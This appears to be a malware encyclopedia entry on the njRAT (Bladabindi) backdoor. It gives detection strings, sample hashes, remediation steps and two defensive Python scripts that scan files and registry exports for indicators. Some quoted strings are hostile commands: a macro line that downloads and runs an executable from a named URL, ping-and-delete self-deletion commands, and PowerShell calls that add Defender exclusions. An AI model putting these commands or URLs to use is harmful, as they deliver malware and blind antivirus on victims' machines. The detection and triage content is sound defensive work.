Concrete signature match: Backdoor - Provides unauthorized remote access for 32-bit Windows platform, family Bladabindi
Backdoor:Win32/Bladabindi!ml is a detection for the backdoor family Microsoft names Bladabindi, better known as njRAT; the njRAT.* resource names and njStub in the string list below are the family's own. The !ml suffix marks a machine-learning-based detection in Microsoft's naming scheme rather than an exact signature, which is why the list spans many crypters, builders and droppers that wrap the same payload. The malware grants remote attackers unauthorized access to and control over the infected system. The strings point to persistence through the CurrentVersion\Run key and the user's Startup folder, configuration kept under HKCU\Software in subkeys with 32-character hexadecimal names (the REGKEY entries), keylogging, webcam enumeration via avicap32.dll, screen capture via CopyFromScreen, delayed self-deletion through cmd.exe and ping, and PowerShell Add-MpPreference calls that exclude the dropped executable from Windows Defender.
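The string list that follows is most useful when turned into an offline triage check. The script below is an added example, not code from this page or from any vendor signature: it extracts ASCII and UTF-16LE strings from a file the way `strings` does and matches them against indicator families drawn from the list. The family grouping, the regular expressions and the sample bytes are this example's own constructions. The UTF-16LE pass matters because .NET user strings (the #US heap) are stored that way, so an ASCII-only pass misses exactly the command lines and registry paths a .NET stub carries.

```python
import re
import sys
from typing import Dict, List

# Indicator families drawn from the string list on this page. The grouping
# and the regular expressions are this example's own choices, not a vendor rule.
INDICATORS: Dict[str, List[bytes]] = {
    "njrat_artifacts": [b"njRAT.proc.resources", b"njRAT.Chat.resources",
                        b"njStub", b"NJServer", b"Keylogger.Bladabindi"],
    "webcam_capture": [b"avicap32.dll", b"capGetDriverDescriptionA"],
    "run_key_persistence": [b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                            b"Start Menu\\Programs\\Startup"],
    "defender_exclusion": [b"Add-MpPreference -ExclusionProcess",
                           b"Add-MpPreference -ExclusionPath"],
}
# Delayed self-deletion as seen in the list: "ping 127.0.0.1 & del", "ping 0 -n 2 & del", "ping 0 & del"
SELF_DELETE_RE = re.compile(rb"ping\s+(?:127\.0\.0\.1|0)(?:\s+-n\s+\d+)?\s*&\s*del\b", re.IGNORECASE)


def extract_strings(data: bytes, min_len: int = 4) -> List[bytes]:
    """Printable ASCII runs plus UTF-16LE runs (like `strings -a` and `strings -el`).
    .NET user strings (#US heap) are UTF-16LE, so an ASCII-only pass misses them."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group(0) for m in ascii_re.finditer(data)]
    found += [m.group(0).decode("utf-16-le").encode("ascii") for m in utf16_re.finditer(data)]
    return found


def scan(data: bytes) -> Dict[str, List[str]]:
    """Map each indicator family to the sorted, de-duplicated indicators found in data."""
    hits: Dict[str, List[str]] = {}
    for s in extract_strings(data):
        low = s.lower()
        for family, needles in INDICATORS.items():
            for needle in needles:
                if needle.lower() in low:
                    hits.setdefault(family, []).append(needle.decode())
        if SELF_DELETE_RE.search(s):
            hits.setdefault("self_delete_cmd", []).append(s.decode())
    return {family: sorted(set(v)) for family, v in hits.items()}


def build_sample() -> bytes:
    """Constructed stand-in for a .NET stub: ASCII metadata names, then UTF-16LE user strings."""
    ascii_part = b"\x00".join([b"MZ", b"njRAT.proc.resources", b"avicap32.dll",
                               b"capGetDriverDescriptionA"]) + b"\x00"
    user_strings = ["SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                    'cmd.exe /c ping 0 -n 2 & del "']
    utf16_part = b"\x00\x00".join(s.encode("utf-16-le") for s in user_strings)
    return ascii_part + utf16_part


if __name__ == "__main__":
    # Pass a file path to scan a real sample; with no argument the constructed blob is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for family, found in scan(blob).items():
        print(f"{family}: {found}")
```

A hit in one family on its own is weak evidence (avicap32.dll is also used by legitimate capture software); several families together, or the self-deletion command next to a Run-key path, is what makes a sample worth a closer look.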
Relevant strings associated with this threat:
- ExeName (PEHSTR_EXT)
- w.exe (PEHSTR_EXT)
- w.My.Resources (PEHSTR_EXT)
- CompDir (PEHSTR)
- Software\043ed596af7365236306a463494dc0f4 (REGKEY)
- Software\08f4dc96bbb7af09d1a37fe35c75a42f (REGKEY)
- Software\0be9b5be78fc1a603e5105b3437989a7 (REGKEY)
- Software\102b3bcad4053f1630a0d725fba934ba (REGKEY)
- Software\1052b8e9071d5b658c32c84c463014f5 (REGKEY)
- Software\125d3f6ae0a53efa91122391603b15de (REGKEY)
- Software\12ce4e06a81e8d54fd01d9b762f1b1bb (REGKEY)
- Software\13cf9d8bf1b79e8de8ac0fe37a6739fe (REGKEY)
- Software\1ce5c21bd74c042cdcd945e699c951c5 (REGKEY)
- Software\2320633bbd5b9c41d628d6d2b760a34d (REGKEY)
- Software\23556fb1360f366337f97c924e76ead3 (REGKEY)
- Software\2fd22e8065aba1ef1bdfa994748d4cec (REGKEY)
- Software\301b5fcf8ce2fab8868e80b6c1f912fe (REGKEY)
- Software\45ca55fc1756e880072f0dde4455397b (REGKEY)
- Software\45cd603ee23d7c7a771df421f5721e99 (REGKEY)
- Software\46d93431630fc8e404fed7204e708738 (REGKEY)
- Software\4a926bc2f0d66095f68f194a4f64ff52 (REGKEY)
- Software\55b3825ee39ada2fcddf7c7accbde69e (REGKEY)
- Software\5cd8f17f4086744065eb0992a09e05a2 (REGKEY)
- Software\60f0d0e0d2dd518d7530a18795742b3f (REGKEY)
- server.exe (PEHSTR_EXT)
- \Nouveau (PEHSTR_EXT)
- njRAT.proc.resources (PEHSTR)
- Builder.resources (PEHSTR)
- njRAT.Chat.resources (PEHSTR)
- ntdll (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR_EXT)
- avicap32.dll (PEHSTR_EXT)
- cmd.exe / (PEHSTR_EXT)
- ping 127.0.0.1 & del " (PEHSTR_EXT)
- Server.exe (PEHSTR_EXT)
- \stub.exe (PEHSTR_EXT)
- ok.exe (PEHSTR_EXT)
- \Mr.Zamil\Zamil\obj\Debug\ (PEHSTR_EXT)
- Patch.exe (PEHSTR_EXT)
- NJServer.exe (PEHSTR_EXT)
- NJServer (PEHSTR_EXT)
- NJServer.MDIParent1.resources (PEHSTR_EXT)
- e = "http://icbg-iq.com/Scripts/kinetics/droids/gangrini/upload/regzab.exe" (MACROHSTR_EXT)
- CreateObject("WScript.Shell").Run (Replace(c, "https://www.google.com/images/srpr/logo1w.png", e)), 0, True (MACROHSTR_EXT)
- Stub.exe (PEHSTR_EXT)
- CreateObject("Wscript.Shell") (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- .sendkeys"{numlock}" (PEHSTR_EXT)
- .sendkeys"{capslock}" (PEHSTR_EXT)
- .sendkeys"{scrolllock}" (PEHSTR_EXT)
- Server.sfx.exe (PEHSTR_EXT)
- \Worm (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- ServerComputer (PEHSTR_EXT)
- CopyFromScreen (PEHSTR_EXT)
- System.Net.Sockets (PEHSTR_EXT)
- Svhost64.Hmza (PEHSTR_EXT)
- Svhost64.Utility (PEHSTR_EXT)
- EXE (PEHSTR_EXT)
- C:\Users\NO_LOVINO\ (PEHSTR_EXT)
- TypeScript Keyboard Sync.exe (PEHSTR)
- 33333333.exe (PEHSTR_EXT)
- .exe (PEHSTR)
- System Exporer.pdb (PEHSTR_EXT)
- Source\Repos\deploy\deploy\obj\Debug\deploy.pdb (PEHSTR_EXT)
- crypter black cat semi fud = usar esse = final\software.pdb (PEHSTR_EXT)
- Software.Resources.resources (PEHSTR_EXT)
- #Bw.#Th.resources (PEHSTR_EXT)
- TubeHygrostat.dll (PEHSTR)
- (%%\rundll32.exe TubeHygrostat,Xerophytes (PEHSTR)
- *%%\rundll32.exe Cholecystostomy,Shorelines (PEHSTR)
- Cholecystostomy.dll (PEHSTR)
- %%%\rundll32.exe Creatinine,Shorelines (PEHSTR)
- Creatinine.dll (PEHSTR)
- %%\rundll32.exe Chilblain,Pretor (PEHSTR)
- Chilblain.dll (PEHSTR)
- QcXFu~jV(;".resources (PEHSTR_EXT)
- ~TVqQ,M,,E,,//8,Lg,,,,AQ,,,,,,,,,,,,,,,,,,,,,,,Ag,,A4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ (PEHSTR)
- System.Net.NetworkInformation (PEHSTR_EXT)
- Covid.exe (PEHSTR_EXT)
- https://hastebin.com/raw/maruzucehi (PEHSTR_EXT)
- http://www.gustabf.tk/update.txt (PEHSTR_EXT)
- \Documents\Pass Vault\AccountPassword (PEHSTR_EXT)
- \Documents\Pass Vault\Keys.txt (PEHSTR_EXT)
- \Documents\Pass Vault\KeysDecrypted.txt (PEHSTR_EXT)
- cmd.exe /c ping 0 -n 2 & del (PEHSTR_EXT)
- get_ExecutablePath (PEHSTR_EXT)
- Decompress (PEHSTR_EXT)
- ExecBytes (PEHSTR_EXT)
- Beta.Charlie (PEHSTR_EXT)
- good.dll (PEHSTR_EXT)
- /c start /I (PEHSTR_EXT)
- njStub (PEHSTR_EXT)
- CompressionMode (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- DecompressGzip (PEHSTR_EXT)
- \Documents\dllhost /f (PEHSTR_EXT)
- cmd.exe /C Y /N /D Y /T 1 & Del (PEHSTR_EXT)
- Debug.txt (PEHSTR_EXT)
- Debug\TestCrypter0.pdb (PEHSTR_EXT)
- temp\Assembly.exe (PEHSTR_EXT)
- svchost.Windows (PEHSTR_EXT)
- C:\Users\AShoky (PEHSTR_EXT)
- svchost.pdb (PEHSTR_EXT)
- $this.Text (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- ScreenLock (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- ComputeStringHash (PEHSTR_EXT)
- CompareString (PEHSTR_EXT)
- https://cdn.discordapp.com/attachment (PEHSTR_EXT)
- RunWorkerCompletedEventHandler (PEHSTR_EXT)
- OneDrive.CSGO_ERR.resources (PEHSTR_EXT)
- Phoenix\source\repos\OneDrive\OneDrive\obj\ (PEHSTR_EXT)
- \OneDrive.pdb (PEHSTR_EXT)
- TVqQAAMAAAAEAAAA// (PEHSTR_EXT)
- cubel.userspprtaddrss@gmail.com (PEHSTR_EXT)
- Esyybfsfz.Properties.Resources (PEHSTR_EXT)
- TripleDESCryptoServiceProvider (PEHSTR_EXT)
- System.Threading.Tasks (PEHSTR_EXT)
- System.Net.Http (PEHSTR_EXT)
- HttpClient (PEHSTR_EXT)
- FuckinPizdec.core.Config (PEHSTR_EXT)
- Updata.exe (PEHSTR_EXT)
- AAhvUE4rEQTdIaoQ5jS (PEHSTR_EXT)
- AesCryptoServiceProvider (PEHSTR_EXT)
- Anon_SE.Resources.resource (PEHSTR_EXT)
- moc.nibetsap (PEHSTR_EXT)
- /war/@58EC30A9C23230564C@ (PEHSTR_EXT)
- a.top4top.io/p_2428mn69 (PEHSTR_EXT)
- LOST.DIR (PEHSTR_EXT)
- Newtonsoft.Json (PEHSTR_EXT)
- virus@satinfo.es (PEHSTR_EXT)
- Keylogger.Bladabindi (PEHSTR_EXT)
- Malware.Postal (PEHSTR_EXT)
- Ransom.Servcc (PEHSTR_EXT)
- Trojan.DistTrack (PEHSTR_EXT)
- Malware.Zambrano (PEHSTR_EXT)
- OQVwu.dll (PEHSTR_EXT)
- fwsrM.dll (PEHSTR_EXT)
- SHELL.pdb (PEHSTR_EXT)
- SHELL.exe (PEHSTR_EXT)
- C:\Users\xD\source\repos\SHELL\SHELL\obj\Release\SHELL.pdb (PEHSTR_EXT)
- Powered by SmartAssembly 8.1.0.4892 (PEHSTR_EXT)
- 4System.Web.Services.Protocols.SoapHttpClientProtocol (PEHSTR_EXT)
- BasedAntiVT.exe (PEHSTR_EXT)
- asdjJ.My.Resources (PEHSTR_EXT)
- EbVk9dMWvodsu0FgZR.NmURtsZH4NPNGZPSBg (PEHSTR_EXT)
- PNtI1fLt4Uo6sHbjOZ.h4cXQoprHHsXJ7n4FT (PEHSTR_EXT)
- iW9w8DsHAomrjYpRwi.iihBjoh62YiGXsMgBR (PEHSTR_EXT)
- /:/CQ0JX,FV1Vd2We0Sa4Tc4Q (PEHSTR_EXT)
- shell.Run Gbkjkskbnmbsss (PEHSTR_EXT)
- sS.Resources.resource (PEHSTR_EXT)
- SEEDCRACKER.g.resources (PEHSTR_EXT)
- CM_Links.Properties.Resources.resource (PEHSTR_EXT)
- MI.exe (PEHSTR_EXT)
- xra8xOYACcZLOEIdG1.7QPJAtJLH9hkO4Nex9 (PEHSTR_EXT)
- WindowsApplication2.Resources.resource (PEHSTR_EXT)
- tmpC394.tmp (PEHSTR_EXT)
- 33333333.g.resources (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- sss.Resources (PEHSTR_EXT)
- WindowsFormsApp1.Properties.Resources.resources (PEHSTR_EXT)
- exe2powershell-master (PEHSTR_EXT)
- imfree2.Resources.resource (PEHSTR_EXT)
- Encryptado.exe (PEHSTR_EXT)
- HttpResponse (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR_EXT)
- CompressShell (PEHSTR_EXT)
- TVqQ==M====E====//8==Lg=========Q===============================================g=====4fug4=t=nNI (PEHSTR_EXT)
- sk-krona.fun (PEHSTR_EXT)
- qapifexugaroluruje (PEHSTR_EXT)
- textfile.txt (PEHSTR_EXT)
- Microsoft\svchost.exe (PEHSTR_EXT)
- cmd.exe /k ping 0 & del (PEHSTR_EXT)
- root\SecurityCenter (PEHSTR_EXT)
- Nero lait\obj\Debug\Nero lait.pdb (PEHSTR_EXT)
- i_Shitted_My_Self.exe (PEHSTR_EXT)
- http://167.71.14.135 (PEHSTR_EXT)
- Add-MpPreference -ExclusionProcess "svchost.exe" (PEHSTR_EXT)
- AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (PEHSTR_EXT)
- AppData\Roaming\Microsoft\Windows';Add-MpPreference -ExclusionPath 'C:\Users (PEHSTR_EXT)
- Microsoft\Windows\Windows.exe (PEHSTR_EXT)
- powershell.exe (PEHSTR_EXT)
- \obj\Debug\Software.pdb (PEHSTR_EXT)
- X.lugia.resources (PEHSTR_EXT)
- XClient.g.resources (PEHSTR_EXT)
- crypter0.My.Resources (PEHSTR_EXT)
- ExtractAndRunExe (PEHSTR_EXT)
- R///e///////g/A//////s/m/./e////x/////e (PEHSTR_EXT)
- Uninst.exe (PEHSTR_EXT)
- Uninstaller.exe (PEHSTR_EXT)
- Uninstal.exe (PEHSTR_EXT)
- N/T(. (SNID)
- .L`]vM (SNID)
- .0eIM[ (SNID)
- //#9w (SNID)
- "aU\W (SNID)
- Nt^r8f. (SNID)
- KZ.C:S (SNID)
- xzP\yf (SNID)
- \V`bo] (SNID)
- Gag\4 (SNID)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Associated sample hashes:
- 00da14d8bbe2c85a04314b0ac40c13ebb67fe6693af8e786e63a2c6f6a428b00
- e4d13cb5c3dcb794f7464ae665fafa2390107672417b8203432a6646344e3895

Remediation: Immediately isolate the infected system from the network. Perform a full system scan with an updated antivirus solution to remove the backdoor and associated components. The strings above show where to look on a suspected host: the CurrentVersion\Run key and the user's Startup folder for entries that launch an executable from AppData (copies named svchost.exe or Windows.exe appear in the list), HKCU\Software subkeys with 32-character hexadecimal names, scheduled tasks, and Windows Defender exclusions added with Add-MpPreference (review them with Get-MpPreference and remove them with Remove-MpPreference). Review system logs for signs of lateral movement or data exfiltration, keeping in mind that the strings also reference keylogging, webcam and screen capture, and ensure all operating systems and applications are patched to prevent re-infection.
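Checking those locations by hand on a live host is error-prone, so here is an added example (not part of this page) that works on a `reg export` of the relevant hives instead: it parses the .reg text and flags the three registry artifact classes the strings point at, a 32-hex-character subkey directly under HKCU\Software, Run values that launch something from a user-writable directory, and Windows Defender exclusion entries (what Add-MpPreference -ExclusionPath and -ExclusionProcess write under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions). The export text is constructed for the example; the 32-hex key name is one of the REGKEY strings above and the paths follow the svchost.exe and AppData strings on this page.

```python
import re
import sys
from typing import Dict, List, Tuple

HEX32_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
# Executables launched from these locations deserve a look; installed software lives elsewhere.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData)\\", re.IGNORECASE)
RUN_KEY_SUFFIX = "\\software\\microsoft\\windows\\currentversion\\run"
# Where Add-MpPreference -ExclusionPath / -ExclusionProcess persist their entries
DEFENDER_EXCL = "\\windows defender\\exclusions\\"


def _unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse `reg export` / .reg text into {key: {value_name: data}}.
    Covers quoted strings and dword values; multi-line hex values are not needed here."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(Default)" if name == "@" else _unescape(name.strip('"'))
        if data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def hunt(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for the artifact classes the strings on this page point at."""
    findings: List[Tuple[str, str]] = []
    for key, values in keys.items():
        parts = key.split("\\")
        low = key.lower()
        # 1. HKCU\Software\<32 hex chars>: the shape of the REGKEY entries listed above
        if (len(parts) == 3 and parts[0] == "HKEY_CURRENT_USER"
                and parts[1].lower() == "software" and HEX32_RE.match(parts[2])):
            findings.append(("hex32_software_key", key))
        # 2. Run values that launch something from a user-writable directory
        if low.endswith(RUN_KEY_SUFFIX):
            for name, data in values.items():
                if USER_WRITABLE_RE.search(data):
                    findings.append(("run_value_user_writable_path", f"{name} -> {data}"))
        # 3. Defender exclusions, the persistent effect of Add-MpPreference
        if DEFENDER_EXCL in low:
            for name in values:
                findings.append(("defender_exclusion", f"{parts[-1]}: {name}"))
    return findings


# Constructed export, not data from a real host.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft]

[HKEY_CURRENT_USER\Software\5cd8f17f4086744065eb0992a09e05a2]
"cfg"="constructed"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"svchost"="\"C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\svchost.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
"svchost.exe"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows"=dword:00000000
"""

if __name__ == "__main__":
    # A real `reg export` file is UTF-16 with a BOM; pass its path to parse that instead of the sample.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_EXPORT
    for finding, detail in hunt(parse_reg_export(text)):
        print(f"{finding}: {detail}")
```

Export the two hives with `reg export HKCU hkcu.reg` and `reg export "HKLM\SOFTWARE\Microsoft\Windows Defender" defender.reg` (the latter needs an elevated prompt), then run the script on each file; the Startup folder and scheduled tasks from the remediation note still need a separate look because they are not registry data.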